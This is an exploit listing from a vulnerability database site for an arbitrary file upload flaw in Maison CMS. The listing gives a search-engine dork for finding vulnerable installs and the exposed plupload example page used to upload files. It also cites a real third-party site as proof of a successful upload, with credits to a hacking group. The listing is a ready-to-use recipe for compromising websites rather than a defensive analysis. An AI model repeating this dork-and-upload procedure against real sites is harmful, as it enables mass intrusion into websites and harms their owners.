Maison CMS Arbitrary File Upload

2018.01.19
ir K4an (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"intext:"assets/admin/plugins/plupload"

====================================================== # Exploit Title: Maison CMS Arbitrary File Upload # Google Dork: intext:"intext:"assets/admin/plugins/plupload" # Date: 2018-01-19 # Author: K4an # Tested on: Win 7, Linux *************************************************** # exploit => /assets/admin/plugins/plupload/examples/custom.html # Add exploit => http://www.site.com/assets/admin/plugins/plupload/examples/custom.html *************************************************** # Proof : http://maison33.com/assets/admin/plugins/plupload/examples/custom.html # Your uploaded file path : http://maison33.com/assets/admin/plugins/plupload/examples/upload/file_1516368486_7953730.gif ===================================================== # Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY # Iranian Anonymous # Telegram Channel: https://t.me/irananonymous # Discovered By: Saman.Khan


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top